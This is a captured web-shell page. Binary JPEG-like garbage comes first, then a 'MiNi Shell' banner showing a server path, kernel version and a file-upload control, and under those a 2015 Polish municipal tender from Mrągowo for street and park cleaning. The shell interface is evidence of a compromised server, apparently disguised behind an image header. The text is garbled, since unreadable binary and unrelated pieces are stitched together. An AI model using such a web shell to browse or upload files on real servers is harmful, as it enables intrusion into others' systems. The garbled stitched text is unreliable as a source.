JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151118/310248-N-2015.html

<p class="kh_header"><b>Mrągowo: Całoroczne oczyszczanie ulic i placów na terenie miasta Mrągowa oraz oczyszczanie terenów miejskich wymagających doraźnego sprzątania na obszarze miasta Mrągowa</b><br>
<b>Numer ogłoszenia: 310248 - 2015; data zamieszczenia: 18.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Mrągowo , ul. Królewiecka 60A, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 89 74190 00, faks 89 7412874.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mragowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całoroczne oczyszczanie ulic i placów na terenie miasta Mrągowa oraz oczyszczanie terenów miejskich wymagających doraźnego sprzątania na obszarze miasta Mrągowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1
Całoroczne oczyszczanie ulic i placów na terenie miasta Mrągowa oraz oczyszczanie terenów miejskich wymagających doraźnego sprzątania na obszarze miasta Mrągowa.
Całoroczne oczyszczanie ulic i placów na terenie miasta Mrągowa, które obejmuje:
1)	jezdnie ulic o nawierzchni utwardzonej o długości 48,314 km, 
2)	pas drogowy o nawierzchni gruntowej o długości 10,303 km,
3)	chodniki i parkingi o powierzchni 81635 m2,
4)	pasy zieleni przydrożnej o powierzchni 73235 m2

Zakres rzeczowy do zadania nr I:
1.	Organizacja biura (punktu kontaktowego, punktu zgłoszeniowego) - kontakt telefoniczny, faksowy lub e-mailowy z osobą odpowiedzialną za realizację usługi ze strony Wykonawcy;
2.	Zamiatanie mechaniczne i ręczne jezdni, bez odśnieżania i zwalczania gołoledzi, zbieranie zmiotek z częstotliwością gwarantującą zachowanie pełnej czystości, nie rzadziej niż dwa razy w tygodniu;
3.	Polewanie wodą jezdni ulic (I kolejność zimowego utrzymania dróg) w okresach wzmożonych upałów utrzymujących się dłużej niż jeden tydzień;
4.	Całoroczne oczyszczanie chodników, miejsc postojowych i parkingów na terenach powierzonych do utrzymania, z częstotliwością zapewniającą pełną estetykę, ale nie rzadziej niż dwa razy w tygodniu (w razie potrzeby przed zamiataniem należy oczyszczaną powierzchnię skropić wodą). Zabrania się wjazdu na chodnik sprzętem o masie całkowitej przekraczającej 3,5 t;
5.	Mechaniczne lub ręczne zbieranie z jezdni, chodników i parkingów na terenach powierzonych do utrzymania, zabrudzeń i zmiotek powstałych z bieżącego ich użytkowania, w taki sposób, by uzyskać wizualny efekt czystej nawierzchni, ale nie rzadziej niż dwa razy w tygodniu;
6.	Mechaniczne lub chemiczne usuwanie chwastów z utwardzonych części dróg powierzonych do utrzymania w okresie wegetacji roślin, z częstotliwością uniemożliwiającą zarastanie powierzchni ulic, ciągów pieszych, ścieżek rowerowych i parkingów, ale nie rzadziej niż dwa razy w miesiącu, z zachowaniem odrębnych przepisów i wymogów dotyczących stosowania środków chemicznych;
7.	Zimowe utrzymanie chodników polegające na dokładnym odśnieżaniu - nie może zalegać na chodniku więcej niż 2 cm śniegu, zwalczaniu śliskości poprzez posypywanie piaskiem lub dopuszczonymi środkami chemicznymi oraz wywożeniu nadmiaru śniegu z chodników, przy temperaturze 0oC i powyżej; śnieg powinien być usunięty całkowicie z chodnika do naturalnej nawierzchni, w okresie odwilży natychmiast odkuć lód przy studzienkach burzowych i krawężniku umożliwiając swobodny spływ wody. Usuwanie śniegu i zwalczenie śliskości będzie wymagane niezwłocznie po wystąpieniu ww. zjawisk niezależnie od czasu i dnia tygodnia;
8.	Ustawienie przy głównych ciągach wskazanych przez Zamawiającego 15 szt. skrzyń do gromadzenia piasku na okres zimowy i zabezpieczenie w odpowiednią ilość piasku do posypywania chodników i schodów;
9.	Codzienne opróżnianie koszy ulicznych do godz. 1000 oraz zbieranie nieczystości wokół koszy na terenie miasta w rejonach powierzonych do utrzymania. Liczba koszy ulicznych wg aktualnego stanu wynosi 335 szt. jednak zamawiający, w zależności od miejscowych potrzeb, zastrzega sobie prawo zwiększenia lub zmniejszenia tej liczby;
10.	Codzienna obsługa 10 szt. psich toalet polegająca na opróżnianiu pojemników na odchody oraz sprawdzaniu i uzupełnianiu woreczków w zasobnikach. Liczba psich toalet może ulec zmianie w trakcie trwania umowy; 
11.	Zbieranie zanieczyszczeń uprzątniętych z chodników przez właścicieli nieruchomości przylegających do drogi nie rzadziej niż dwa razy w tygodniu;
12.	Oczyszczanie z zanieczyszczeń wpustów studzienek burzowych z częstotliwością uniemożliwiającą zapychanie odpływu wód deszczowych, nie rzadziej niż jeden raz w miesiącu;
13.	Utrzymanie pasa zieleni przydrożnej: wykaszanie trawy i chwastów, zbieranie zanieczyszczeń, grabienie liści, utrzymanie estetyki terenu, przynajmniej 2 razy w miesiącu, w okresie wegetacji roślin;
14.	Oczyszczanie chodników, parkingów i jezdni ulic z piasku pozimowego natychmiast po stopieniu śniegu;
15.	Uzupełnianie i remont zniszczonych w okresie trwania umowy koszy ulicznych na odpady, uzupełnianie zniszczonych lub skradzionych wkładów do koszy oraz remont i malowanie ławek ustawionych w ciągach ulic, w terminie do końca kwietnia. Liczba ławek wynosi 92 szt. jednak zamawiający, w zależności od miejscowych potrzeb, zastrzega sobie prawo zwiększenia lub zmniejszenia tej liczby;
16.	Sprzątanie pasa drogowego ulic o nawierzchni gruntowej polegające na zbieraniu zanieczyszczeń przynajmniej dwa razy w tygodniu oraz wykaszanie traw i chwastów przynajmniej 2 razy w miesiącu w okresie wegetacji roślin;
17.	Sprzątanie terenów wymienionych w załącznikach do umowy również w dni wolne od pracy i święta (bez względu na pogodę), a także w trakcie imprez i po imprezach takich jak: Dni Mrągowa, Piknik Country, Festiwal Kultury Kresowej, oraz innych współorganizowanych przez Urząd Miejski w Mrągowie. Ustawienie na czas imprez zwiększonej odpowiednio liczby pojemników na odpady oraz ich wywóz z częstotliwością nie dopuszczającą do ich przepełnienia;
18.	Interwencyjne usuwanie gałęzi, piasku, błota, gruzu, zwłok zwierzęcych, oleju, niedopałków, szkła, papierów, opakowań z tworzyw sztucznych oraz innych przeszkód zagrażających bezpieczeństwu ruchu i pieszych z terenów powierzonych do utrzymania. Zwłoki zwierząt powinny być poddane utylizacji zgodnie z obowiązującymi przepisami; 
19.	Utylizacja zgodnie z przepisami odpadów powstałych w wyniku prowadzenia prac, w tym usuwanie odpadów wskazanych przez Zamawiającego.
Czynności wymienione w pkt. 1-19 Wykonawca powinien wykonywać rzetelnie stosownie do pory roku i warunków atmosferycznych bez dodatkowych dyspozycji ze strony Zamawiającego.

Zadanie Nr 2
Oczyszczanie terenów miejskich wymagających doraźnego sprzątania wskazanych przez Zamawiającego w ramach zleceń jednorazowych.

Zakres rzeczowy do zadania nr II:
1.	Ręczne oczyszczanie terenów z zanieczyszczeń organicznych i nieorganicznych na powierzchni do 15000 m2/rok, zebranie, załadunek, wywóz i utylizacja zgodnie z przepisami;
2.	Koszenie traw i chwastów kosiarką spalinową z powierzchni do 5000 m2/rok , zgrabienie, załadunek na samochód, wywóz i utylizacja zgodnie z przepisami;
3.	Koszenie traw i chwastów kosiarką doczepną do ciągnika z powierzchni do 7000 m2/rok, zgrabienie, załadunek na samochód, wywóz i utylizacja zgodnie z przepisami.
4.	Wycinka krzaków, porostów i odrostów z powierzchni do 100 m2/rok, zebranie, załadunek na samochód, wywóz i utylizacja zgodnie z przepisami /cena ustalona za 1m2 faktycznej wycinki krzaku/
5.	Oczyszczanie lustra wody przybrzeżnej jeziora na powierzchni 5 mb od brzegu i długości 3500 mb/rok z zanieczyszczeń, załadunek na samochód, wywóz i utylizacja zgodnie z przepisami /cena ustalona za 100 mb wód przybrzeżnych/;
6.	Wywóz zgromadzonych zanieczyszczeń luzem (do 20 kursów samochodu o ładowności min. 3,5 t /rok) załadunek na samochód, wywóz i utylizacja zgodnie z przepisami /cena ustalona za jeden kurs samochodu o ładowności min. 3,5 t na terenie miasta na samochód, wywóz na wysypisko i utylizacja /cena ustalona za jeden kurs/;
7.	Wywóz zgromadzonych zanieczyszczeń spakowanych w worki foliowe o pojemności 120 l (do 2000 worków), załadunek na samochód, wywóz i utylizacja zgodnie z przepisami /cena ustalona za jeden worek/. 
8.	Odtworzenie do 30 m2  zniszczonego trawnika - rekultywacja, uzupełnienie humusem, wsiew mieszanki traw i pielęgnacja do czasu ukorzenienia się roślin /cena za 1 m2/ .
Zlecenie robót odbywać się będzie w miarę potrzeb, poprzedzone ustaleniem ilości robót przy udziale upoważnionych przedstawicieli Zamawiającego i Wykonawcy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.10.00-3, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
2. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - spełnieniem tego warunku będzie wykonanie minimum jednej podobnej tego typu usługi na kwotę min. 600 000,00 zł w przypadku zadania 1 i 10 000,00 zł w przypadku zadania 2. Dowody o których mowa wyżej muszą spełniać wymagania określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 lutego 2013 r. (Dz. U. z 2013 r. poz. 231).
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Kryterium społeczne - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dotyczy Zadania 1.
1. Ilość robót i lokalizacja określona w załączniku Nr 1 do umowy może w czasie trwania umowy ulegać zwiększeniu lub zmniejszeniu z powodu budowy nowych odcinków ulic, przejęcia ulic od innych zarządców, przekazaniu ulic innym zarządcom lub zmiany właścicieli nieruchomości wzdłuż których położone są chodniki.
2. Zmniejszenie lub zwiększenie zakresu robót i lokalizacji odbywać się będzie na podstawie aneksu do umowy podpisanego przez obie strony nie później niż 14 dni przed obowiązywaniem zmiany. Zmiana zakresu i ilości robót powodować będzie zmianę wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/mragowo_gmina_miejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mrągowie, ul. Królewiecka 60A, 11-700 Mrągowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2015 godzina 10:30, miejsce: Urząd Miejski w Mrągowie, ul. Królewiecka 60A, 11-700 Mrągowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Całoroczne oczyszczanie ulic i placów na terenie miasta Mrągowa oraz oczyszczanie terenów miejskich wymagających doraźnego sprzątania na obszarze miasta Mrągowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Całoroczne oczyszczanie ulic i placów na terenie miasta Mrągowa oraz oczyszczanie terenów miejskich wymagających doraźnego sprzątania na obszarze miasta Mrągowa.
Całoroczne oczyszczanie ulic i placów na terenie miasta Mrągowa, które obejmuje:
1)	jezdnie ulic o nawierzchni utwardzonej o długości 48,314 km, 
2)	pas drogowy o nawierzchni gruntowej o długości 10,303 km,
3)	chodniki i parkingi o powierzchni 81635 m2,
4)	pasy zieleni przydrożnej o powierzchni 73235 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9, 90.61.10.00-3, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Kryterium społeczne - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Oczyszczanie terenów miejskich wymagających doraźnego sprzątania wskazanych przez Zamawiającego w ramach zleceń jednorazowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oczyszczanie terenów miejskich wymagających doraźnego sprzątania wskazanych przez Zamawiającego w ramach zleceń jednorazowych.

Zakres rzeczowy:
1.	Ręczne oczyszczanie terenów z zanieczyszczeń organicznych i nieorganicznych na powierzchni do 15000 m2/rok, zebranie, załadunek, wywóz i utylizacja zgodnie z przepisami;
2.	Koszenie traw i chwastów kosiarką spalinową z powierzchni do 5000 m2/rok , zgrabienie, załadunek na samochód, wywóz i utylizacja zgodnie z przepisami;
3.	Koszenie traw i chwastów kosiarką doczepną do ciągnika z powierzchni do 7000 m2/rok, zgrabienie, załadunek na samochód, wywóz i utylizacja zgodnie z przepisami.
4.	Wycinka krzaków, porostów i odrostów z powierzchni do 100 m2/rok, zebranie, załadunek na samochód, wywóz i utylizacja zgodnie z przepisami /cena ustalona za 1m2 faktycznej wycinki krzaku/
